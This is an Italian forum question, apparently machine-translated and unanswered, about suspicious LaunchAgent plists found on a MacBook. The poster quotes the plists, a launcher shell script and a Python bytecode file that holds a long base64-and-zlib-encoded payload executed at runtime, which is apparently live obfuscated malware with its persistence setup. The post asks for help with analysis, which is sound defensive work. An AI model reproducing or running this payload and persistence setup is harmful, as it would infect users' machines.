script di Python strano trovato su un computer client Mac Os X.

Question

script di Python strano trovato su un computer client Mac Os X.

1

Stavo rivedendo una macchina Mac Os X (un MacBook Pro alla fine del 2016) e ho trovato alcuni script bizzarri nella cartella LaunchAgent.

8 -rw-r--r--  1 XX  wheel   500 30 Lug 07:18 com.1e1zq.plist
8 -rw-r--r--  1 XX  staff   386 30 Lug 07:18 com.KJ1sG.plist
8 -rw-r--r--  1 XX  wheel   402 21 Ago 10:17 com.VFUaG.plist

dove xx è ovviamente il nome utente della macchina.

Se scrivo uno di quei file che sono il contenuto:

mbp:LaunchAgents XX$ cat com.1e1zq.plist 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>1e1zq</string>
    <key>Program</key>
    <string>/Users/XX/Library/hVf9E/rVru6</string>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>3600</integer>
    <key>WatchPaths</key>
    <array>
        <string>/Users/XX/Downloads</string>
    </array>
</dict>
</plist>

Che è fondamentalmente qualcosa che avvia uno script Python.

Ecco il contenuto dello script Python:

XX$ cat rVru6 
#!/usr/bin/env bash

cd /Users/XX/Library/hVf9E && python 1e1zq

Il contenuto dell'altro script è codificato in base64, ma la mia conoscenza limitata di Python interrompe la mia ricerca qui. Prima di formattare tutto, c'è qualcuno che può darmi un suggerimento su cosa è?

XX$ cat 1e1zq 
?
??U[c@s6ddlZddlZejejd??dUdS(i????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(tzlibtbase64t
decompresst b64decode(((sc.py<module>s

Ho controllato tramite ps aux e un processo Python era in esecuzione. Queste sono le informazioni provenienti dal Monitor attività:

cwd
/Users/Luxx/Library/search.amp
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/Python
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_locale.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/zlib.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_struct.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/binascii.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/time.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/select.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/fcntl.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/cStringIO.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/objc/_objc.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_collections.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/operator.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/itertools.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_heapq.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_ctypes.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_functools.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/strop.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/datetime.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/pyexpat.so
txt
/usr/lib/libexpat.1.dylib
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/CoreFoundation/_inlines.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/Foundation/_inlines.so
txt
/usr/share/icu/icudt57l.dat
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/CoreFoundation/_CoreFoundation.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC/Foundation/_Foundation.so
txt
/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload/_hashlib.so
txt
/usr/lib/dyld
txt
/private/var/db/dyld/dyld_shared_cache_x86_64h
0
/dev/null
1
/dev/null
2
/dev/null
5
->0xe2c607c2888f3c11
7
->0xe2c607c2888f3b51

python malware macosx rootkits

posta elbuild 11.11.2018 - 23:00

fonte

0 risposte

Leggi altre domande sui tag python malware macosx rootkits

Aiutami a capire Encryptpad e 7-zip per la crittografia Aiutare a capire questa funzione di hash [chiuso]